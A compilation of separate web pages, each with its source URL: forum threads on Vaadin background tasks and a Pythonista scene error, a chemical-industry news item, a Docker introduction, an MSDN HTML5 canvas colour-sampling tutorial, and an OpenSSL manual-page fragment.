        if (prevayler == null) {
            try {
                prevayler = PrevaylerFactory.createPrevayler(users, "gasdiarydata");
            } catch (IOException e) {
                e.printStackTrace();
            } catch (ClassNotFoundException e) {
                e.printStackTrace();
            }
        }
        ...

Well, I'm not sure if this is the best example. You'll have to consider thread-safety, for example.

Yes, that's what I was just trying. Works great. I'm coding in Scala, so it was literally as easy as changing "class" to "object" for my processing class to make it a singleton. I then made it extend Actor and respond to an update message. So now the concurrency is handled by the Actor messaging. Only one update is running at a time, and the update messages can be sent asynchronously. With a little additional logic, the actor won't redo updates if they're requested too soon. It just drops the queued-up messages that arrive too quickly. The result is that each client requests fresh data frequently and is given the freshest data to use, while rate-limiting the updates.
Note that you must synchronize on the application if you change user interface stuff outside the request/response cycle. Otherwise strange things will occur if the user happens to interact with the application while the data is being updated. Best Regards, Marc
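For readers following along in plain Java rather than Scala actors, the static/singleton pattern discussed above can be sketched like this. All names here are illustrative (not from the thread), and in Vaadin you would additionally synchronize on the application before touching UI components from a background thread, as Marc notes.

```java
import java.util.ArrayList;
import java.util.Collections;
import java.util.List;

// Sketch: a shared, thread-safe data holder visible to all user sessions.
public final class SharedData {
    private static final SharedData INSTANCE = new SharedData();

    private final List<String> items =
            Collections.synchronizedList(new ArrayList<String>());

    private SharedData() {}

    public static SharedData getInstance() { return INSTANCE; }

    // Safe to call from a background updater thread
    public void add(String item) { items.add(item); }

    // Hand each session its own copy; iteration over a synchronizedList
    // must itself be synchronized, so the copy happens inside the lock
    public List<String> snapshot() {
        synchronized (items) {
            return new ArrayList<String>(items);
        }
    }
}
```

Each session reads via snapshot(), so a background task can keep appending without sessions ever iterating a list that is being mutated underneath them.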
https://vaadin.com/forum/thread/147346/background-shared-task-on-server
30 March 2012 09:04 [Source: ICIS news]

SINGAPORE (ICIS)--China's Fuxiang Chemical is expected to reduce operating rates at its styrene butadiene rubber (SBR) plant in April, according to a company source.

The company is currently running the plant at 90% capacity, the source said. "The plant is producing non-oil grade SBR 1502 currently; we may begin to produce oil-extended SBR," the source said.

Fuxiang Chemical restarted its 50,000 tonne/year butadiene rubber (BR) plant at the same site on 28 March and is expected to run it at 60% capacity in April, the source said, without specifying the current rate.

"Poor margins may be a reason for Fuxiang Chemical to reduce SBR and BR production in April, because of the [high] prices of butadiene (BD), a feedstock of SBR and BR," an industry source said.

BD prices were assessed at yuan (CNY) 26,000/tonne ($4,127/tonne) ex-tank Yangtze, while non-oil grade SBR was assessed at CNY23,500-24,300/tonne EXWH (ex-warehouse) east China, according to data from Chemease, an ICIS service in China, on 29 March. BR was assessed at CNY27,800-28,300/tonne EXWH east China.

"Compared with BD prices, non-oil grade SBR 1502 and BR should be priced at above CNY25,000/tonne and CNY30,000/tonne, respectively, to ensure margins for makers," the source added.
http://www.icis.com/Articles/2012/03/30/9546173/chinas-fuxiang-chemical-to-drop-operating-rates-at-sbr-plant-in.html
What this error

Traceback (most recent call last):
  File "/var/containers/Bundle/Application/F3A42D55-5CB1-4DC2-AFF5-5BE7BB053375/Pythonista3.app/Frameworks/Py3Kit.framework/pylib/site-packages/scene.py", line 161, in _setup_scene
    self.setup()
  File "/private/var/mobile/Library/Mobile Documents/iCloud~com~omz-software~Pythonista3/Documents/PPEasy/PPEasy.py", line 11, in setup
    self.present_modal_scene(Lvl_1())
  File "/var/containers/Bundle/Application/F3A42D55-5CB1-4DC2-AFF5-5BE7BB053375/Pythonista3.app/Frameworks/Py3Kit.framework/pylib/site-packages/scene.py", line 125, in present_modal_scene
    other_scene.z_position = max(n.z_position for n in self.children) + 1
ValueError: max() arg is an empty sequence

from scene import *
import sound
import random
import math

A = Action

class MyScene (Scene):
    def setup(self):
        self.background_color = 'white'
        self.present_modal_scene(Lvl_1())

    def did_change_size(self):
        pass

    def update(self):
        pass

    def touch_began(self, touch):
        pass

    def touch_moved(self, touch):
        pass

    def touch_ended(self, touch):
        pass

class Lvl_1(Scene):
    def setup(self):
        self.main_node = Node(parent=self)
        self.bg_color = SpriteNode(color='blue', size=self.size/2, position=(self.size.w/2, self.size.h * 80), parent=self)
        self.name = LabelNode('tezt', ('Arial', 30), position=(self.size.w/2, self.size.h * 40), parent=self)

class Lvl_3(Scene):
    def setup(self):
        pass

class K_N95(Scene):
    def setup(self):
        pass

class N95(Scene):
    def setup(self):
        pass

class Papr(Scene):
    def setup(self):
        pass

class Gowns(Scene):
    def setup(self):
        pass

class Face_Shield(Scene):
    def setup(self):
        pass

class Oxy(Scene):
    def setup(self):
        pass

class Alcohol(Scene):
    def setup(self):
        pass

class Bleach(Scene):
    def setup(self):
        pass

class Ammonia(Scene):
    def setup(self):
        pass

class k_n95(Scene):
    def setup(self):
        pass

if __name__ == '__main__':
    run(MyScene(), PORTRAIT, show_fps=False)

@resserone13 it seems that the reason is that your main scene is empty

@resserone13 so it works also

class MyScene (Scene):
    def setup(self):
        self.background_color = 'white'
        self.main_node = Node(parent=self)
        self.present_modal_scene(Lvl_1())

@cvp right. It looks like I needed to add a node. Thanks as always. I'm going to make a simple app real quick to explain the difference in the types of protective masks. I work at a hospital and you'd be surprised how many people are confused about which masks are for what. I'm not sure how I can actually get it into an app though. The app itself is just going to present pictures and text. I wonder how hard it would be to package it up.

@resserone13 try this; the marked line is the line that generates the error

class MyScene (Scene):
    def setup(self):
        self.background_color = 'white'
        try:
            print(max(n.z_position for n in self.children))
        except Exception as e:
            print(e)
        self.main_node = Node(parent=self)
        print(max(n.z_position for n in self.children))
        #self.present_modal_scene(Lvl_1())

@resserone13 said:

> Going to make a simple app real quick to explain the difference in the types of protective masks.

Would like to help but can't imagine how - resserone13

@cvp that sounds good. Once I get it done, which should be in the next day or two, I'll post it on GitHub or the forum and let you know. It should be pretty simple. Each scene will have a title, a picture of the mask, and a description of when it should be used. I'll let you know.

This post is deleted! (last edited by resserone13)

I was still busy debugging, too long a text...

@resserone13 try

self.text = 'This is a level 1 mask. \nThis mask is suitable for general\n areas such as lobbies or the cafeteria. \nIt is NOT recommended to ware a Level 1 \nwhile working with patients'

wear a mask, not ware a mask

@resserone13, for your app, this could work really well:
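Separately from the link the last post refers to, the root cause in this thread, calling max() over an empty children sequence, can be guarded generically with max()'s default argument. A small standalone sketch (the Node class here is a stand-in, not Pythonista's):

```python
class Node:
    def __init__(self, z_position):
        self.z_position = z_position

def next_z_position(children):
    # default=0 makes an empty scene yield 1 instead of raising
    # "ValueError: max() arg is an empty sequence"
    return max((n.z_position for n in children), default=0) + 1

print(next_z_position([]))                   # 1
print(next_z_position([Node(2), Node(5)]))   # 6
```

Adding a node first (as cvp suggested) avoids the error too; the default argument just makes the computation safe either way.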
https://forum.omz-software.com/topic/6775/what-this-error/1
The Docker containers Webinar: on October 19, I held Part 1 of a three-part webinar series on Docker. For those of you who could not attend, this post summarizes the webinar material. It also includes some additional items that I’ve added based on the QA session. Finally, I will highlight some of the best audience questions and wrap up with our plans for Part 2. You can watch part 1 here. Docker & Containers I’m guessing that you’ve heard about Docker by now. Docker is taking the industry by storm by making container technologies accessible to IT professionals. First of all, let’s start with the basics: What is Docker, what are Docker containers, and how are they related? Docker is one part of the suite of tools provided by Docker Inc. to build, ship, and run Docker containers. Docker containers start from Docker images. A Docker image includes everything needed to start the process in an isolated container. It includes all of the source code, supporting libraries, and other binaries required to start the process. Docker containers run Docker images. Docker containers build on Linux kernel features such as LXC (Linux containers), Cgroups (control groups), and namespaces to fully isolate the container from other processes (or containers) running on the same kernel. That’s a lot to unpack. Here’s how Docker Inc. describes Docker: “Docker containers wrap a piece of software in a complete filesystem that contains everything needed to run: code, runtime, system tools, system libraries – anything that can be installed on a server. This guarantees that the software will always run the same, regardless of its environment. — What’s Docker?“ Docker Containers Examples Here are some real-world examples. Say your team is building several different web applications, which are most likely written in different languages. One application may be written in Ruby and another in Node.js. Each application requires its own system packages to compile things like libraries. 
Deploying these types of polyglot applications makes infrastructure more complex. As a result, Docker solves this problem by allowing each team to package the entire application as a Docker image. The image can be used to start your application where it runs the same regardless of the environment. The benefits are a clean hand-off between development and production (build images, then deploy them), development and production parity, and infrastructure standardization. Best of all, each Docker container will be fully isolated from others so that engineers can allocate more or fewer compute resources (such as CPU, Memory, or IO) to individual containers. This ensures that each Docker container has the exact amount of resources that it requires. First-time users and those considering Docker (or any other container technology) ask the question: What’s the difference between containers and virtual machines? Containers vs. Virtual Machines Naturally, this question came up in the webinar. I answered it in the QA on the community forum as well: “Docker’s about page has a good summary. Docker containers (and other container technologies) work by isolating processes and their resources using kernel features. This allows running multiple containers on a single kernel. Virtual machines are different. In this scenario there are multiple independent kernel with running on a single hypervisor. Each kernel running on the hypervisor sees a complete set of virtualized hardware. Nothing is virtualized in Docker’s case. Containers vs VMs also have different compute footprints–notably in memory. They use less memory because they don’t need to run an entire operating system. Finally, containers are also intended to run a single process. Virtual machines on the other hand can run many processes. Docker focuses on “operating system” virtualization while virtual machines focus on hardware virtualization.” In summary, containers run a single process. 
Virtual machines may run any number of processes. Containers run a single kernel. Virtual machines run on a hypervisor. Containers require less memory because you don’t need to allocate memory to a completely separate kernel. Both technologies allow resource control. Use Cases for the Development Phase Building software is one of the most complex human activities. It is constantly changing and full of complications. Complexity multiplies when engineers use multiple languages and data stores. Consequently, workflows become more complicated and bootstrapping new team members never goes as expected. Containers may be applied to the software development phase for drastic productivity increases—especially in polyglot teams. Docker is a great tool to leverage during the development phase. Here are some examples: - Automating development environments. Say you’re building a C program. You’ll need a bunch of libraries and other things installed on the system. This can be packaged as a Dockerfile and committed to source control. As a result, every team member will have the same environment independent of their own system. - Managing data stores. Perhaps you have one project that depends on database version A. Another project runs on version B. Running both versions may not be possible with your package manager. However, it’s trivial to start a container for version A and B, and then point the application to talk to the containers. - Improve cross OS development. Consider a team using Linux, OSX, and Windows. Building the application on each platform will create many problems. Instead, if you package the application as a Dockerfile, each team member can always run the same thing. - Development & production parity. Build and use an image in development. Then use it for staging and production. You can be certain that the same code is running the same way. Use Cases for the Deployment Phase Building software is only half the battle. After we’ve created it, we’ve got to deploy. 
This is where containers really shine. I’m a bit production biased these days so I’ll list the most important (and my favorite!) point first: - Standardizing deployment infrastructure. This one is massive! DevOps and traditional teams can build standardized infrastructure to run and scale any application. Even if a new language comes out, it’s no problem. Deploy with Docker and it doesn’t matter what’s inside the container. Running and orchestrating containers in production is the hottest topic right now. Watch this space. - Isolating CI builds. CI systems can be fickle. Each project may change the machine in some way: You may need to install some random software or drop artifacts everywhere. Don’t even get me started on project dependencies. With containers, all of these problems are a thing of the past. Run each build in an ephemeral container and throw it away afterward. No fuss, no muss. - Testing new versions. It’s a happy day. The newest version of Language X was just released and it’s time to migrate. You just want to test it out, so you setup a virtual machine to not break your existing setup. This is a resource heavy and time-consuming process. Docker makes this easy. Simply change the image tag from language:x to language:y. - Distributing software. You’ve just finished your tool in language X. Unfortunately, your tool has a ton of dependencies that your users may not be knowledgeable enough to install. Build a Docker image and push it to a Docker registry. Now anyone can pull down your image and run your software. This is especially nice for handing builds over to your QA team. Installation & Toolchain Docker can be installed on Windows, OSX, and Linux systems. The Windows and OSX versions run a Linux system with a Docker daemon. The Docker client is configured to talk to the virtual machine. The distribution’s package manager makes it easy to install Docker on Linux. Once Docker is installed, you can start using the larger Docker toolchain components. 
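To give a feel for the Compose tool described next, here is a minimal Compose file for a two-service app. Everything in it, service names, image tag, and ports, is illustrative rather than taken from the webinar:

```yaml
version: "2"
services:
  web:
    build: .              # build the app image from a local Dockerfile
    ports:
      - "8000:8000"       # host:container
    depends_on:
      - db                # start the database container first
  db:
    image: postgres:9.6   # an official image pulled from the Docker registry
    environment:
      POSTGRES_PASSWORD: example
```

With a file like this in place, a single `docker-compose up` builds, creates, and starts both containers together.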
Everything is built on top of the Docker Engine. The Docker Engine is the daemon running on a computer that manages all containers. The docker command is a client. It makes API requests to the Docker Engine. This means that Docker follows a client/server model. They communicate over HTTP. Next comes Docker Registry. The Docker Registry is an image store. Users can push images to the registry so that other users can pull images to their installations. Users may employ the official registry for distributing public images. Paid plans are available if you need private images. You can also host your own Docker registry. The Docker community maintains a set of official images, including those for databases like MySQL, PostgreSQL, MongoDB, and many languages. Odds are, there is an official image for your use case. Docker Compose is a tool for developing and shipping multi-container applications based on a configuration file. You’ll definitely come into contact with this common tool. Docker Compose does all the heavy lifting and makes it easier to share and develop more complex applications. Docker Machine is a tool for bootstrapping Docker hosts. A Docker host is a machine that runs the Docker Engine. Docker Machine can create machines on cloud providers like AWS, Azure, GCP, and Rackspace. It can also create “local” machines using VirtualBox or VMWare. It’s hard to cover these tools well in a text format. Therefore, I recommend that you check out the Introduction to Docker course or watch the demo in the webinar. Both of these resources demonstrate basic Docker functionalities and how to use Docker Compose to build a multi-container application. Part 2: From Dev to Production The first session introduced the Docker concept and how to develop applications using Docker. The next session will focus on deploying Docker applications. 
I’ll cover production orchestration tools and wrap up with a cool demo on creating a multi-stage application with Docker Compose and Docker Machine. The webinar is currently planned for November, so stay tuned for the announcement. I hope to see you there!
https://cloudacademy.com/blog/docker-containers-how-they-work/
Sampling image colors with Canvas

Create your own eyedropper effect to extract colors from a drawing or photograph using HTML5 canvas methods.

Introduction

Sampling colors from an image can add interest and flexibility to websites such as a fashion site or home decorating site. Users can pick colors from sample images to change the look of a pair of jeans, a car, or a house. The getImageData and putImageData methods in the canvas API make sampling pixels or a whole photograph relatively easy. Several other canvas APIs are used as well: drawImage to put the photo onto a canvas, the CanvasImageData object, and its data property. Here we talk about how to use getImageData to sample colors on a photo to make a color-coordinated picture frame. The frame is created by using the border property with Cascading Style Sheets (CSS), so it's not an integral part of the canvas or image. However, the syntax is displayed so that you can copy it into your own webpage code. For additional reference, the color sample is also displayed as the individual Red, Green, Blue, and Alpha (transparency) values, the CSS color value, and the Hue, Saturation, and Value (HSV) value. The image data acquired using getImageData is also manipulated to convert a color photo to a black and white image. The putImageData method is used to put the manipulated data back onto the canvas. The example's HTML code sets up the canvas and input elements to get and select the URLs of photos. Four images are hard coded into the webpage, but the input field lets you paste in any other image. When the app needs an image to use, it gets the URL from the input field when the drop-down box (select element) changes or when the Load button is clicked. The full sample is available on the MSDN sample site.

Getting the photo onto a canvas

The first step in sampling the colors is to get the photo onto a canvas element. The canvas element by itself has no visual presence on the page.
You need to add content for it to be useful, in this case an image. The canvas object only has a few methods and properties. Most of the drawing and manipulation of images on a canvas is accomplished using the CanvasRenderingContext2D object. The context object is returned by the getContext method of the canvas object with the statement var ctx = canvas.getContext("2d");. Currently only a 2D context is supported in Windows Internet Explorer 9 and Internet Explorer 10, but 3D contexts such as WebGL are supported in some other browsers. Unlike an img tag, the canvas element doesn't have a src property to assign a URL. In this example, an img element is created and the image is assigned to that. The image is later transferred to the canvas using the drawImage method of the context object. This next example creates global variables for the canvas element ("canvas") and the context object ("ctx"). An image object is created ("image") that holds the photos as they are loaded. In the sample, the getImage() function sets the src of the image object to the value of the input field. The image takes some time to load, depending on the size of the file, so the webpage needs to wait for it to finish loading. To do that, the onreadystatechange event handler is used to monitor the image. Within the handler the readyState property is used to watch for a complete state value.

function getImage() {
    var imgSrc = document.getElementById("fileField").value;
    if (imgSrc == "") {
        imgSrc = rootPath + samplefiles[0]; // Get first example
        document.getElementById("fileField").value = imgSrc;
    }
    image.src = imgSrc; // image.complete
    image.addEventListener("load", function () {
        var dimension = 380; // Keep dimensions reasonable
        var dw;
        var dh;
        // set max dimension
        if ((image.width > dimension) || (image.height > dimension)) {
            if (image.width > image.height) {
                // scale width to fit, adjust height
                dw = parseInt(image.width * (dimension / image.width));
                dh = parseInt(image.height * (dimension / image.width));
            } else {
                // scale height to fit, adjust width
                dh = parseInt(image.height * (dimension / image.height));
                dw = parseInt(image.width * (dimension / image.height));
            }
            canvas.width = dw;
            canvas.height = dh;
        } else {
            // small enough already; keep dw/dh defined for drawImage below
            dw = image.width;
            dh = image.height;
            canvas.width = image.width;
            canvas.height = image.height;
        }
        ctx.drawImage(image, 0, 0, dw, dh); // Put the photo on the canvas
        setBorder(); // Update color border
    }, false);
}

To keep the photo at a size that fits on the screen, the photo is scaled if it's too large. When the width or height is greater than the size of the canvas that's been designated, in this case 380 x 380 pixels, a scaling value is calculated. Because photos aren't necessarily square, only the largest dimension (width or height) is used for a scaling percentage. That value is used to scale the other dimension so the aspect ratio is preserved when displayed in the canvas. The photo is then copied to the canvas using the drawImage method. The drawImage method takes an image object, and x and y pixel coordinates that define the upper-left corner in the image. With these values you can specify where on the image to start displaying, which could be used to display portions of a tiled image for animation. The width and height parameters are also used, which specify the size to make the image. For this example, the width and height of the image are scaled to 380 pixels or less, shrinking the image to fit the canvas. The drawImage method also supports four more parameters that can be used to place the image in the canvas. For more info, see the drawImage reference page.

Get a pixel value

To get the value of a pixel, the getImageData method is used to get an imageData object.
The imageData object contains a pixelArray that contains the actual pixels of the canvas image. The pixelArray is arranged in RGBA (red, green, blue, alpha) format. To find the value of a single pixel that is the target of a mouse click, you need to calculate the index into the pixelArray based on the x and y coordinates and the width of the canvas. The formula ((y * canvas.width) + x) * 4 gets the offset into the array. To get each color, start with the first value at the offset into the pixelArray, and then get the next three values. This gives you the RGBA value for the pixel. What we've done here uses the getImageData method to read pixels directly from a canvas image. The getImageData method incorporates a security requirement that stops a canvas webpage from copying pixels from one computer domain to another (cross domain). A cross-domain image can be transferred to the canvas using drawImage, but when the getImageData method is used to copy the pixels to the pixelArray, it throws a DOM exception security error (18). The example contains a function called getSafeImageData() to catch cross-domain errors without crashing the whole page. The getSafeImageData() function contains try and catch statements to catch exceptions. If no exceptions occur, the function returns the pixelArray object. If a security error occurs on a canvas element, it sets the origin-clean flag (an internal flag) to false. No other image can be loaded until the flag is cleared, which is done by refreshing the page, or by destroying and creating a new canvas. The getSafeImageData() function, upon catching an exception, removes the canvas element from the page, creates a new canvas, and assigns the same attributes and events to the new one. After the new canvas (with a clean-origin flag set to true) is created, the error message is printed to the new canvas.
The getSafeImageData() function returns an empty string, which is used to signal that the getImageData method failed. From here, you should load another image from the samples, or your own in the same domain. To keep compatibility of the code between Windows 7 and Windows 8, the JavaScript parseInt() method is used to normalize the mouse coordinates to integers. In Windows 8, mouse coordinates are returned as floating point values to provide sub-pixel information for CSS and other UI functions. In this example, parseInt() is applied before the calculation to prevent rounding errors that will cause the wrong values to be returned from the pixelArray. As a side note, if you use a floating point number as an index into the pixelArray, it returns nothing because array indices are integer values only. The RGBA value of the pixel that is returned from the pixelArray is converted to a hex value and used as the background color for the CSS border. Only the RGB values are used, and the following example shows how to convert the three values to a single CSS compatible color.

function getHex(data, i) {
    // Builds a CSS color string from the RGB value (ignore alpha)
    return ("#" + d2Hex(data[i]) + d2Hex(data[i + 1]) + d2Hex(data[i + 2]));
}

function d2Hex(d) {
    // Converts a decimal number to a two digit Hex value
    var hex = Number(d).toString(16);
    while (hex.length < 2) {
        hex = "0" + hex;
    }
    return hex.toUpperCase();
}

In this example, the pixelArray value that was calculated based on the x/y mouse coordinates is passed to the getHex function. The getHex function calls the d2Hex() function that converts the decimal RGB values into two-digit hex values. Each converted RGB value is concatenated into a string, and a "#" sign is added to the beginning to create the CSS color value format. This value is then used to set the color of the border style, along with some other properties.
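The offset formula and hex conversion described above are pure arithmetic, so they can be sanity-checked in isolation, outside the browser. This standalone sketch re-implements them just for checking (pixelOffset is a name introduced here, not from the sample):

```javascript
function pixelOffset(x, y, width) {
  // Each pixel occupies 4 consecutive array slots: R, G, B, A
  return ((y * width) + x) * 4;
}

function d2Hex(d) {
  // Decimal 0-255 -> two-digit uppercase hex
  var hex = Number(d).toString(16);
  while (hex.length < 2) hex = "0" + hex;
  return hex.toUpperCase();
}

// On a 380-pixel-wide canvas, the pixel at (10, 2) starts at index 3080
console.log(pixelOffset(10, 2, 380)); // 3080

// RGB (78, 128, 135) becomes the CSS color "#4E8087"
console.log("#" + d2Hex(78) + d2Hex(128) + d2Hex(135)); // #4E8087
```
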
For example, a teal colored border with rounded corners and a 3-D look is style='border-color:#4E8087; border-width:30px; border-style:groove; border-radius:20px'.

CSS elements

The frame around the canvas is created using the border property. The default values are 30px wide, with a solid style and no border radius. As the values change, the syntax is displayed below the image. The color of the border is set when you click the image. The style and radius (rounded corners) values are picked from drop-down menus. The example offers five border styles. In addition to solid, you can choose the 3-D border style properties: outset, inset, groove, and ridge. The outset and inset styles are flat frame styles with lighting effects. Groove and ridge styles are a more 3-D frame with lighting effects. The lighting effects give the appearance of a keylight coming from either the upper-left or lower-right corner. The border radius style drop-down menu provides four values: 5, 10, 20, and 30 pixels. These numbers are arbitrary, and can be set to any value you think is appropriate. As CSS style values are updated, the syntax line shown under the image is updated.

Keeping the data display readable

The example uses the sampled color values as a background color for the color value (RGB, CSS, and HSV) display fields. All the display fields, and the image's border property, are assigned a class="colorDisp". This allows the example to quickly set the background color on all the elements at one time. The displays are colored using the setDispColors() function, which passes in the background and font colors. Because the background colors can range from a light beige to a deep dark black, the color of the font that is printed over the background is a concern.
To figure out which to display, the sampled color is converted to grayscale; if the value is greater than a set point (lighter), the text is printed in black, otherwise it's printed in white. The sample uses a threshold of 128, halfway between 0 and 255, the range of RGB values. The calcGray() function determines the font color. This technique works with most colors, but you can experiment with the threshold to fine-tune it for your page.

Convert a color photo to black and white

The same technique we just used to get the color of a single pixel can be used to manipulate all the pixels. In the next example, every pixel in the pixelArray is sampled and modified to convert a color photo to black and white. Each pixel's red, green, and blue values are averaged to get a single number, and the original value of each color channel is replaced by that average. Because each channel then has the same value, the result is a grayscale image made up of values that range from black to white.

The makeBW() function shown in the next example starts by getting the pixelArray from the canvas. A pair of for loops works through the pixelArray, getting each pixel value. The RGB values are added together and the sum is divided by three to get the average; the alpha (transparency) value is ignored. The resulting value is then copied back into each color channel (RGB) of the pixel in the array. When all pixels have been converted, the putImageData method is used to put the pixelArray back into the canvas.
    function makeBW() {
        // Converts image to B&W by averaging the RGB channels, and setting each to that value
        ctx.drawImage(image, 0, 0, canvas.width, canvas.height); // refresh canvas
        imgData = getSafeImageData(0, 0, canvas.width, canvas.height);
        if (imgData != "") {
            for (y = 0; y < imgData.height; y++) {
                for (x = 0; x < imgData.width; x++) {
                    var i = ((y * 4) * imgData.width) + (x * 4);
                    var aveColor = parseInt((imgData.data[i] + imgData.data[i + 1] + imgData.data[i + 2]) / 3);
                    imgData.data[i] = aveColor;
                    imgData.data[i + 1] = aveColor;
                    imgData.data[i + 2] = aveColor;
                }
            }
            ctx.putImageData(imgData, 0, 0);
        }
    }

The code in the example kicks off when you click the Grayscale button. Click Load to reload the color image.

Adding a sepia or cyanotype tint

Turning a photo from color to black and white is a nice way to give an image a more nostalgic look. To push the clock back even further, you can go for a sepia or cyanotype tone. These processes have been used for over a hundred years to create effects and to enhance photos' archival properties. The original processes used harsh chemicals to replace the silver in photographic paper with other compounds, producing the color effects. With digital images, the process is similar, but with a lot less mess.

Converting a photo to sepia or cyanotype involves several steps, performed on each pixel:

- Retrieve a pixel from the pixelArray.
- Convert the pixel to black and white.
- Convert the grayscale pixel (RGB) to the HSV color model.
- Add (or subtract) hue, saturation, and value to the pixel's HSV value to create the tint.
- Convert the tinted pixel back to the RGB color model.
- Put the pixel back into the pixelArray.

The following example shows the rgb2hsv() and hsv2rgb() functions, and the makeTint() function that adds the HSV values to the pixels. The tints are added as HSV values because it's easier to do with a single value.
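The averaging step that makeBW() performs on the canvas data can be exercised on a plain array as well. The function name averagePixels below is mine, not from the article:

```javascript
// Average the RGB channels of each RGBA pixel in place (alpha untouched),
// mirroring the loop in makeBW() but without a canvas.
function averagePixels(data) {
  for (var i = 0; i < data.length; i += 4) {
    var ave = Math.floor((data[i] + data[i + 1] + data[i + 2]) / 3);
    data[i] = data[i + 1] = data[i + 2] = ave;
  }
  return data;
}

// One red-ish pixel: R=200, G=50, B=50, A=255
console.log(averagePixels([200, 50, 50, 255])); // [ 100, 100, 100, 255 ]
```

Because all three channels end up equal, the pixel renders as a gray whose brightness is the average of the original channels.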
The hue is the color, based on a 360-degree scale often shown in software as a color wheel. Saturation and value (sometimes known as lightness, luminosity, or brightness) are expressed as percentages (0-100%). Tinting an image to a sepia tone is done by adding Hue = 30 and Sat = 30 to the grayscale values; nothing is added to the Val parameter for sepia tone. To create a cyanotype image, the formula is to add Hue = 220 and Sat = 40. Val is set to add 10% to lighten the image slightly, as the bluish tint can appear darker than you might want. This value is arbitrary and could be different depending on the photo. For more info about these models, see the article HSL and HSV in Wikipedia.

    function rgb2hsv(r, g, b) {
        // Converts RGB value to HSV value
        var Hue = 0;
        var Sat = 0;
        var Val = 0;
        // Convert to a percentage
        r = r / 255;
        g = g / 255;
        b = b / 255;
        var minRGB = Math.min(r, g, b);
        var maxRGB = Math.max(r, g, b);
        // Check for a grayscale image
        if (minRGB == maxRGB) {
            Val = parseInt((minRGB * 100) + .5); // Round up
            return [Hue, Sat, Val];
        }
        var d = (r == minRGB) ? g - b : ((b == minRGB) ? r - g : b - r);
        var h = (r == minRGB) ? 3 : ((b == minRGB) ? 1 : 5);
        Hue = parseInt(60 * (h - d / (maxRGB - minRGB)));
        Sat = parseInt((((maxRGB - minRGB) / maxRGB) * 100) + .5);
        Val = parseInt((maxRGB * 100) + .5); // Round up
        return [Hue, Sat, Val];
    }

    function hsv2rgb(h, s, v) {
        // Set up rgb values to work with
        var r;
        var g;
        var b;
        // Sat and value are expressed as 0 - 100%;
        // convert them to 0 to 1 for calculations
        s /= 100;
        v /= 100;
        if (s == 0) {
            v = Math.round(v * 255); // Convert to 0 to 255 and return
            return [v, v, v]; // Grayscale, just send back value
        }
        h /= 60; // Divide by 60 to get 6 sectors (0 to 5)
        var i = Math.floor(h); // Round down to nearest integer
        var f = h - i;
        var p = v * (1 - s);
        var q = v * (1 - s * f);
        var t = v * (1 - s * (1 - f));
        // Each sector gets a different mix
        switch (i) {
            case 0: r = v; g = t; b = p; break;
            case 1: r = q; g = v; b = p; break;
            case 2: r = p; g = v; b = t; break;
            case 3: r = p; g = q; b = v; break;
            case 4: r = t; g = p; b = v; break;
            default: r = v; g = p; b = q; break;
        }
        // Convert all decimal values back to 0 - 255
        return [Math.round(r * 255), Math.round(g * 255), Math.round(b * 255)];
    }

    // Accept and add a Hue, Saturation, or Value for tinting.
    function makeTint(h, s, v) {
        // Converts color to b&w, then adds tint
        var imgData = getSafeImageData(0, 0, canvas.width, canvas.height);
        if (imgData != "") {
            for (y = 0; y < imgData.height; y++) {
                for (x = 0; x < imgData.width; x++) {
                    var i = ((y * imgData.width) + x) * 4; // our calculation
                    // Get average value to convert each pixel to black and white
                    var aveColor = parseInt((imgData.data[i] + imgData.data[i + 1] + imgData.data[i + 2]) / 3);
                    // Get the HSV value of the pixel
                    var hsv = rgb2hsv(aveColor, aveColor, aveColor);
                    // Add incoming HSV values (tones)
                    var tint = hsv2rgb(hsv[0] + h, hsv[1] + s, hsv[2] + v);
                    // Put updated data back
                    imgData.data[i] = tint[0];
                    imgData.data[i + 1] = tint[1];
                    imgData.data[i + 2] = tint[2];
                }
            }
            // Refresh the canvas with updated colors
            ctx.putImageData(imgData, 0, 0);
        }
    }

    function sepia() {
        // Refresh the canvas from the img element
        ctx.drawImage(image, 0, 0, canvas.width, canvas.height);
        makeTint(30, 30, 0);
    }

    function cyanotype() {
        // Refresh the canvas from the img element
        ctx.drawImage(image, 0, 0,
        canvas.width, canvas.height);
        makeTint(220, 40, 10);
    }

Summary

There are many other things you can do by grabbing the values of pixels in a canvas. For example, you can test sampled pixels for a specific color value and overlay another image to do a simple chroma-key (green screen) effect. This effect is used in television and movies to composite images, putting a weatherman in front of a raging storm or an actor on top of a mountain from the comfort of the studio.

Related topics
- Canvas Element
- Canvas Properties
- MSDN sample site
- Contoso Images photo gallery
- HSL and HSV Wikipedia article
- Method Methods
- Unleash the power of HTML 5 Canvas for gaming
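As a final sanity check on the HSV math behind the sepia and cyanotype recipes, the conversion can be exercised in isolation. This is a compact sketch of the standard HSV-to-RGB formulas (not the article's exact code); it shows that a mid gray plus the sepia values (Hue 30, Sat 30) lands on a warm, brownish RGB triple:

```javascript
// Standalone HSV-to-RGB using the standard sector formulas.
// h in degrees (0-360), s and v as percentages (0-100).
function hsv2rgb(h, s, v) {
  s /= 100; v /= 100;
  if (s === 0) { var g = Math.round(v * 255); return [g, g, g]; } // pure gray
  h /= 60;                                  // six 60-degree sectors
  var i = Math.floor(h), f = h - i;
  var p = v * (1 - s), q = v * (1 - s * f), t = v * (1 - s * (1 - f));
  var rgb = [[v, t, p], [q, v, p], [p, v, t], [p, q, v], [t, p, v], [v, p, q]][i % 6];
  return rgb.map(function (x) { return Math.round(x * 255); });
}

console.log(hsv2rgb(0, 0, 50));   // mid gray: [ 128, 128, 128 ]
console.log(hsv2rgb(30, 30, 50)); // same lightness with the sepia tint: [ 128, 108, 89 ]
```

Red stays put while green and blue drop, which is exactly the warm shift the sepia recipe relies on.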
https://msdn.microsoft.com/library/jj203843.aspx
#include <openssl/x509.h>

    int X509_NAME_get_index_by_NID(X509_NAME *name, int nid, int lastpos);
    int X509_NAME_get_index_by_OBJ(X509_NAME *name, ASN1_OBJECT *obj, int lastpos);
    int X509_NAME_entry_count(X509_NAME *name);
    X509_NAME_ENTRY *X509_NAME_get_entry(X509_NAME *name, int loc);
    int X509_NAME_get_text_by_NID(X509_NAME *name, int nid, char *buf, int len);
    int X509_NAME_get_text_by_OBJ(X509_NAME *name, ASN1_OBJECT *obj, char *buf, int len);

X509_NAME_get_index_by_NID() and X509_NAME_get_index_by_OBJ() retrieve the next index matching nid or obj after lastpos (lastpos should initially be set to -1). If there are no more entries, -1 is returned; if nid is invalid, -2 is returned.

X509_NAME_entry_count() returns the total number of entries in name.

